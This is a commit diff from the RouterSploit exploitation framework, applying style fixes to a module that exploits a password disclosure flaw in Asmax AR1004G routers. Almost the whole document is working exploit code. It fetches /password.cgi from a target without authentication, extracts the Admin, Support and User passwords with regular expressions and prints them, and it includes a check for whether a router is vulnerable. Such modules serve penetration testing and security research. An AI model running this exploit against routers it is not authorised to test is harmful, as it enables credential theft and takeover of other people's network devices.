Cosmetics and PEP8 fixes

6321f085 · fwkz · 1ba4743a · 6321f085
Commit 6321f085 authored Apr 16, 2016 by fwkz
Hide whitespace changes
Inline Side-by-side

Showing with 26 additions and 28 deletions

ar_1004g_password_disclosure.py ...it/modules/exploits/asmax/ar_1004g_password_disclosure.py +26 -28

No files found.
--- a/routersploit/modules/exploits/asmax/ar_1004g_password_disclosure.py
+++ b/routersploit/modules/exploits/asmax/ar_1004g_password_disclosure.py
@@ -18,52 +18,51 @@ class Exploit(exploits.Exploit):
    """
    __info__ = {
        'name': 'Asmax AR1004G Password Disclosure',
-        'description': 'Exploits asmax password disclosure vulnerability that allows to fetch credentials for: Admin, Support and User accounts.',
+        'description': 'Exploits asmax password disclosure vulnerability that allows to '
+                       'fetch credentials for: Admin, Support and User accounts.',
        'authors': [
-            'Marcin Bury <marcin.bury@reverse-shell.com>', # routersploit module
+            'Marcin Bury <marcin.bury@reverse-shell.com>',  # routersploit module
-         ],
+        ],
        'references': [
-             'https://github.com/lucyoa/exploits/blob/master/asmax/asmax.txt'
+             'https://github.com/lucyoa/exploits/blob/master/asmax/asmax.txt',
-         ],
+        ],
-         'targets': [
+        'targets': [
-             'Asmax AR 1004g'
+             'Asmax AR 1004g',
-         ]
+        ]
    }
-    target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
+    target = exploits.Option('', 'Target address e.g. http://192.168.1.1')  # target address
-    port = exploits.Option(80, 'Target port') # default port
+    port = exploits.Option(80, 'Target port')  # default port
    def run(self):
+        creds = []
        url = sanitize_url("{}:{}/password.cgi".format(self.target, self.port))
        print_status("Requesting for {}".format(url))
        try:
-            r = requests.get(url)
+            response = requests.get(url).text
-            res = r.text
        except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema):
-            print_error("Invalid URL format: %s" % url)
+            print_error("Invalid URL format: {}".format(url))
            return
        except requests.exceptions.ConnectionError:
-            print_error("Connection error: %s" % url)
+            print_error("Connection error: {}".format(url))
            return
-        creds = []
+        admin = re.findall("pwdAdmin = '(.+?)'", response)
-        admin = re.findall("pwdAdmin = '(.+?)'", res)
+        if admin:
-        if len(admin):
            creds.append(('Admin', admin[0]))
-        support = re.findall("pwdSupport = '(.+?)'", res)
+        support = re.findall("pwdSupport = '(.+?)'", response)
-        if len(support):
+        if support:
            creds.append(('Support', support[0]))
-        user = re.findall("pwdUser = '(.+?)'", res)
+        user = re.findall("pwdUser = '(.+?)'", response)
-        if len(user):
+        if user:
            creds.append(('User', user[0]))
-        if len(creds):
+        if creds:
            print_success("Credentials found!")
-            headers = ("Login", "Password")
+            print_table(("Login", "Password"), *creds)
-            print_table(headers, *creds)
        else:
            print_error("Credentials could not be found")
@@ -71,12 +70,11 @@ class Exploit(exploits.Exploit):
        url = sanitize_url("{}:{}/password.cgi".format(self.target, self.port))
        try:
-            r = requests.get(url)
+            response = requests.get(url).text
-            res = r.text
        except:
            return None  # could not be verified
-        if any(map(lambda x: x in res, ["pwdSupport", "pwdUser", "pwdAdmin"])):
+        if any(map(lambda x: x in response, ["pwdSupport", "pwdUser", "pwdAdmin"])):
-            return True   # target vulnerable
+            return True  # target vulnerable
        return False  # target not vulnerable